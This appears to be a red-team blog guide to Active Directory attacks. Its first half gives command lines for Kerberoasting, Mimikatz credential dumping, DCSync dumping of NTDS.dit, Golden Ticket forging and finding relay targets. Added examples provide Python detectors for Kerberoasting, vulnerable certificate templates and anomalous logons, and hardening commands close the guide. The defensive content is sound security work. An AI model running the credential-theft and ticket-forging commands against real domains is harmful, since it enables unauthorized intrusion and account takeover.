2025-02-15
Active Directory (AD) is the crown jewel for attackers during engagements. This comprehensive guide dives deep into techniques that every red teamer should have in their arsenal. From recon to privilege escalation, it’s all about navigating and exploiting AD’s complexity.
Key Highlights:
1️⃣ Reconnaissance with BloodHound & PowerView
Map out AD relationships and uncover attack paths using BloodHound.
```bash
# Install BloodHound
sudo apt-get install bloodhound
# Run the BloodHound collector
bloodhound-python -d <domain> -u <username> -p <password> -c All
```
Enumerate users, groups, and domain policies with PowerView.
```powershell
# Import PowerView
Import-Module .\PowerView.ps1
# Enumerate domain users
Get-NetUser
```
2️⃣ Privilege Escalation:
Exploit Kerberoasting and Pass-the-Hash to compromise service accounts.
```bash
# Kerberoasting with Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>:<password>
```
Abuse vulnerable Group Policy Objects (GPOs) to escalate privileges.
```powershell
# Enumerate GPOs
Get-NetGPO
```
3️⃣ Credential Dumping:
Leverage Mimikatz and DCSync attacks to extract sensitive credentials.
```
# Mimikatz command for credential dumping (typed at the mimikatz console prompt)
mimikatz # sekurlsa::logonpasswords
```
Dump NTDS.dit for domain-wide access.
```bash
# Using Impacket to dump NTDS.dit
secretsdump.py -just-dc <domain>/<user>:<password>@<DC_IP>
```
4️⃣ Kerberos Ticket Attacks:
Deploy Golden Ticket and Silver Ticket attacks to maintain persistent access.
```
# Golden Ticket attack with Mimikatz (typed at the mimikatz console prompt)
mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt> /id:<id>
```
Exploit Kerberoasting to crack service account credentials offline.
```bash
# Crack Kerberoasting hashes with Hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23, RC4)
hashcat -m 13100 -a 0 hashes.txt wordlist.txt
```
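The flip side of the two Kerberoasting steps above (the TGS request, then offline cracking) is that every service ticket request lands in the domain controller's Security log as event 4769, and the RC4 encryption type (0x17) that hashcat mode 13100 cracks stands out once AES is the norm. The following detection logic is an added example, not code from the original post: it runs over a handful of constructed 4769 records and flags a requester that pulled RC4 service tickets for several distinct SPN-bearing accounts in a short window. The field names follow the 4769 EventData schema; the window and threshold values are assumptions to tune per environment.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 (TGS request) records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Field names follow the 4769
# EventData schema: TargetUserName, ServiceName, TicketEncryptionType, IpAddress.
SAMPLE_4769 = [
    {"time": "2025-02-15T09:00:01", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2025-02-15T09:00:02", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2025-02-15T09:01:00", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    {"time": "2025-02-15T09:01:01", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    {"time": "2025-02-15T09:01:02", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    {"time": "2025-02-15T09:30:00", "TargetUserName": "carol@CORP.LOCAL", "ServiceName": "svc_legacy",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.12"},
]

RC4_HMAC = "0x17"               # etype 23: the ticket type hashcat mode 13100 cracks offline
WINDOW = timedelta(minutes=5)   # assumption: tune per environment
THRESHOLD = 3                   # distinct service accounts requested within WINDOW


def is_service_account_ticket(ev):
    """Machine accounts (trailing '$') and krbtgt use strong keys or are not crackable
    in practice; the targets worth watching are user accounts carrying an SPN."""
    svc = ev["ServiceName"]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def rc4_service_tickets(events):
    """Every RC4 service-ticket request for a user-style service account.
    In a domain that enforces AES, each of these deserves a look on its own."""
    return [(ev["TargetUserName"], ev["ServiceName"]) for ev in events
            if ev["TicketEncryptionType"].lower() == RC4_HMAC and is_service_account_ticket(ev)]


def detect_kerberoasting(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requester: sorted list of services} for requesters that obtained RC4
    service tickets for at least `threshold` distinct service accounts within `window`."""
    per_user = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() == RC4_HMAC and is_service_account_ticket(ev):
            per_user[ev["TargetUserName"]].append((datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # slide the window over this user's requests
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                alerts[user] = sorted(in_window)
                break
    return alerts


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

The sample flags `bob@CORP.LOCAL` (three RC4 tickets in two seconds) and leaves `carol@CORP.LOCAL`'s single request to the lower-severity `rc4_service_tickets` list. The structural fix is the one the detection relies on: move service accounts to AES-only keys (or group Managed Service Accounts) and give any remaining RC4-dependent account a long random password, so a cracked ticket is not a realistic outcome.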
5️⃣ Misconfigurations to Exploit:
Attack poorly configured LDAP and SMB signing settings.
```bash
# Check SMB signing with CrackMapExec (hosts without signing are written to relay.txt)
crackmapexec smb <target> --gen-relay-list relay.txt
```
Abuse Active Directory Certificate Services (AD CS) for privilege escalation.
```powershell
# Enumerate AD CS templates
Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=com" -Filter *
```
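Listing the templates is only the first step; what makes a template abusable is a specific combination of its attributes, and that combination is what an AD CS audit should test for. The block below is an added example, not code from the original post or from any of the tools it lists. It evaluates the classic ESC1 conditions over constructed template records shaped like the LDAP attributes the `Get-ADObject` query above returns (`msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage`); the `enroll` field is an assumption standing in for the template ACL already resolved to the principals holding the Enroll right.

```python
"""Audit AD CS certificate templates for the ESC1 misconfiguration.

A template is exposed when, at the same time: a low-privileged principal can enroll,
the enrollee may supply the subject name, the certificate can be used to authenticate
to the domain, and neither manager approval nor an authorized signature is required.
Any one of those being false closes the path, so the fix is to change whichever is
cheapest to change. The template records below are constructed sample data.
"""

# Bit in msPKI-Certificate-Name-Flag: the requester chooses the subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: requests are held for CA certificate manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}

# Principals whose Enroll right makes a template reachable by ordinary accounts.
# Assumption: the caller has already resolved the template ACL into these names.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

SAMPLE_TEMPLATES = [  # constructed
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "enroll": ["Domain Users"]},
    {"name": "VPNUsers", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users"]},
    {"name": "ApprovedDevices", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Computers"]},
    {"name": "CodeSigning", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.3"],
     "enroll": ["Authenticated Users"]},
]


def allows_authentication(ekus):
    """An empty EKU list means the certificate is valid for any purpose, authentication included."""
    return not ekus or any(oid in AUTH_EKUS for oid in ekus)


def template_findings(t):
    """Return the reasons a template is ESC1-exposed; an empty list means it is not."""
    reasons = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    if allows_authentication(t.get("pKIExtendedKeyUsage", [])):
        reasons.append("authentication EKU")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if t.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no authorized signatures required")
    if LOW_PRIV_PRINCIPALS & set(t.get("enroll", [])):
        reasons.append("low-privileged enrollment")
    # Only the conjunction of all five conditions is a problem.
    return reasons if len(reasons) == 5 else []


def audit_templates(templates):
    """Map each exposed template name to the list of conditions that make it exposed."""
    result = {}
    for t in templates:
        reasons = template_findings(t)
        if reasons:
            result[t["name"]] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in audit_templates(SAMPLE_TEMPLATES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Of the four constructed templates only `VPNUsers` is reported: the built-in `User` template builds the subject from AD, `ApprovedDevices` requires manager approval, and `CodeSigning` has no authentication EKU. For a reported template, clearing "Supply in the request", adding manager approval, or restricting Enroll to the group that actually needs the certificate each breaks the chain on its own.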
Tools for Success:
- BloodHound: BloodHound GitHub
- CrackMapExec: CrackMapExec GitHub
- Mimikatz: Mimikatz GitHub
- Impacket: Impacket GitHub
- PingCastle: PingCastle Official Site
What Undercode Says
Active Directory remains a critical component in enterprise environments, and its security is paramount. The techniques outlined in this guide are essential for red teamers to understand and for defenders to detect and counter. Here are some additional commands and practices to further enhance your AD security posture:
1. Regularly Audit AD Permissions:
```powershell
# Check for excessive permissions on a sensitive OU (adjust the DN to your environment); filtering on the DN alone shows objects, not who can write to them
(Get-Acl -Path "AD:\OU=Admin,DC=<domain>,DC=com").Access |
    Where-Object { $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner' } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
```
2. Monitor for Anomalous Logins:
```powershell
# Check for unusual login times: successful logons (event 4624) in the last 24 hours
Get-EventLog -LogName Security -InstanceId 4624 -After (Get-Date).AddHours(-24)
```
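Pulling the last day of 4624 events is the easy part; the value is in what you test them for. The block below is an added example, not code from the original post. Over a few constructed 4624 records it applies two checks a defender would actually want: interactive logons by watch-listed privileged accounts outside business hours, and NewCredentials (LogonType 9) logons made through the `seclogo` logon process, which is the trace left when credentials are injected into a fresh logon session (the `runas /netonly` pattern, and the one Pass-the-Hash tooling produces) rather than typed at a console. The business-hours range and the privileged-account list are assumptions.

```python
"""Triage Security event 4624 (successful logon) records for off-hours privileged access
and for credential injection. The events below are constructed sample data."""
from datetime import datetime

BUSINESS_HOURS = range(8, 18)                 # assumption: 08:00-17:59 local, Monday to Friday
PRIVILEGED_ACCOUNTS = {"administrator", "da_alice"}   # constructed watch list of admin accounts
INTERACTIVE_TYPES = {"2", "10", "11"}         # Interactive, RemoteInteractive (RDP), CachedInteractive

SAMPLE_4624 = [  # constructed; field names follow the 4624 EventData schema
    {"time": "2025-02-14T10:15:00", "TargetUserName": "bob", "LogonType": "10",
     "IpAddress": "10.0.0.9", "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    {"time": "2025-02-15T03:12:00", "TargetUserName": "da_alice", "LogonType": "10",
     "IpAddress": "10.0.0.44", "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    {"time": "2025-02-14T11:00:00", "TargetUserName": "bob", "LogonType": "9",
     "IpAddress": "-", "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"time": "2025-02-14T12:00:00", "TargetUserName": "WS01$", "LogonType": "3",
     "IpAddress": "10.0.0.5", "LogonProcessName": "Kerberos", "AuthenticationPackageName": "Kerberos"},
]


def outside_business_hours(ts):
    """Weekend, or a weekday hour outside BUSINESS_HOURS."""
    return ts.weekday() >= 5 or ts.hour not in BUSINESS_HOURS


def triage_logons(events):
    """Return [(reason, account, time)] for every logon that matches one of the two checks."""
    findings = []
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        user = ev["TargetUserName"].lower()
        if (ev["LogonType"] in INTERACTIVE_TYPES
                and user in PRIVILEGED_ACCOUNTS
                and outside_business_hours(ts)):
            findings.append(("off-hours privileged interactive logon", ev["TargetUserName"], ev["time"]))
        # LogonType 9 + seclogo: a new logon session created with supplied credentials.
        if ev["LogonType"] == "9" and ev["LogonProcessName"].lower() == "seclogo":
            findings.append(("injected credentials (LogonType 9 via seclogo)", ev["TargetUserName"], ev["time"]))
    return findings


if __name__ == "__main__":
    for reason, account, when in triage_logons(SAMPLE_4624):
        print(f"{when} {account}: {reason}")
```

The sample reports `da_alice` (RDP at 03:12 on a Saturday) and `bob`'s seclogo logon, and ignores the workstation's routine network logon. The seclogo check will also fire on legitimate `runas /netonly` use by administrators, so in practice it is worth pairing with the source host and process rather than alerting on it alone.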
3. Implement SMB Signing:
```powershell
# Require SMB signing on all devices: the client side alone still leaves the host's own shares open to relay, so set both sides
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
```
4. Secure LDAP:
```powershell
# Require LDAP signing on each domain controller (LDAPServerIntegrity: 1 = None, 2 = Require signing).
# This is a registry setting on the DC, normally deployed through the GPO setting "Domain controller: LDAP server signing requirements"; it is not an attribute of the Default Domain Policy object
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' -Name 'LDAPServerIntegrity' -Value 2 -Type DWord
```
5. Harden Kerberos:
```powershell
# Kerberos ticket lifetime (MaxTicketAge, in hours; 10 is the default) is a Kerberos Policy setting in the Default Domain Policy GPO, not a password-policy parameter. Set it there and verify the value from the GPO report
$gpo = [xml](Get-GPOReport -Name 'Default Domain Policy' -ReportType Xml)
$gpo.GPO.Computer.ExtensionData.Extension.Account | Where-Object { $_.Name -eq 'MaxTicketAge' } | Select-Object Name, SettingNumber
```
6. Regularly Update GPOs:
```powershell
# Force an immediate Group Policy refresh so changed security settings apply without waiting for the background interval (gpupdate applies policy; it does not install updates)
gpupdate /force
```
7. Monitor for DCSync Attacks:
```powershell
# Check for DCSync permissions: list who holds the replication extended rights on the domain head; anything beyond Domain Controllers, Enterprise Domain Controllers, Administrators and approved sync accounts needs review
(Get-Acl -Path "AD:\DC=<domain>,DC=com").Access |
    Where-Object { $_.ObjectType -in '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' } |
    Select-Object IdentityReference, ObjectType
```
8. Implement Advanced Threat Protection:
```powershell
# Enable Microsoft Defender Network Protection (an attack surface reduction feature of Defender for Endpoint, formerly branded ATP)
Set-MpPreference -EnableNetworkProtection Enabled
```
9. Regularly Backup AD:
```powershell
# Back up the AD database: a System State backup from a domain controller includes NTDS.dit and SYSVOL
wbadmin start systemstatebackup -backuptarget:<target>
```
10. Educate Your Team:
```powershell
# Conduct regular security training
Invoke-Command -ScriptBlock { Start-Process -FilePath "C:\Path\To\Training.exe" }
```
By following these practices and commands, you can significantly reduce the attack surface of your Active Directory environment. Always stay updated with the latest security patches and advisories to keep your systems secure.
For further reading, check out these resources:
Stay vigilant, and keep your AD secure!